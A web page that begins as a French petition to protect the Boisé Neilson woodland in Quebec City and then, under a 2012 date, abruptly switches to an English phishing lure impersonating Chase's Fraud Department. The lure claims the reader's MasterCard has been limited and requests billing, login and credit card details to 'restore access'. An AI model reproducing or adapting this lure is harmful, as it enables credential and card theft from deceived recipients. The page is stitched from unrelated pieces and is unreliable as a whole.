Pétition pour sauver le boisé Neilson

Nous nous opposons au nouveau projet de la ville de Québec qui permettrait la construction de plus de 1000 logements dans des tours allant jusqu’à 8 étages sur 60% du Boisé Neilson, un milieu naturel d’intérêt répertorié par la ville abritant une forêt remarquable et une espèce rare de salamandre. Selon l’avis d’experts, ce projet met en danger la survie du 40% restant du boisé et de la salamandre. Nous demandons que la ville protège ce boisé exceptionnel, un des derniers vestiges de la forêt naturelle qui recouvrait l’arrondissement Ste-Foy/Sillery.

S.V.P. ne pas mettre d'accents dans le formulaire. Pour ceux qui éprouvent des difficultés à signer la pétition électronique sur ce site, envoyez un message avec votre nom et adresse indiquant votre volonté de signer la pétition à boiseneilson@live.ca .

lundi 21 mai 2012

Security Alert

Your MasterCard account has been temporarily limited.   
  Chase Fraud Department has recently reviewed your account information, and suspect that your Chase MasterCard account may have been accessed from an unauthorized computer or by a third party. This may happen also due to changes in your IP address or unknown location of purchase. Protecting the security of your accounts and the Chase network is our primary concern.
Therefore, for your own protection and integrity, Chase Fraud Department has temporarily limited your MasterCard account.
We thank you for your prompt attention to this matter. Please understand that this is a security measure intended to help protect you and your accounts.
We apologize for any inconvenience and please don't worry, no funds have been deducted from your Chase MasterCard.

  Your information is securely transmitted via https (S S L) 128-bit Encryption Help us restore your account access. We'll use the information below to find your information in our records. Tell us how we can identify you and your account. Click "Confirm" when you're ready to verify and restore your account access.

Account Type & Online Profile

Billing Address Information*
Customer Identification*
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Online Information*
Credit Card Information*
Chase Fraud Department checks account information for security purposes. The verification process takes about 5 seconds. After your information is successfully verified and updated, you'll be prompted to log into your restored Chase online account.
For security purposes:After restoring your account access, please delete cookies and history from your Internet Browser.
 Security | Terms of Use  
 � 2012 JPMorgan Chase & Co.
Dear Chase customer,

You have an urgent message attached to this email.
We thank you for your prompt attention to this matter.

Chase Customer Service & Support
JPMorgan Chase Bank, N.A. Member FDIC
© 2012 JPMorgan Chase & Co.

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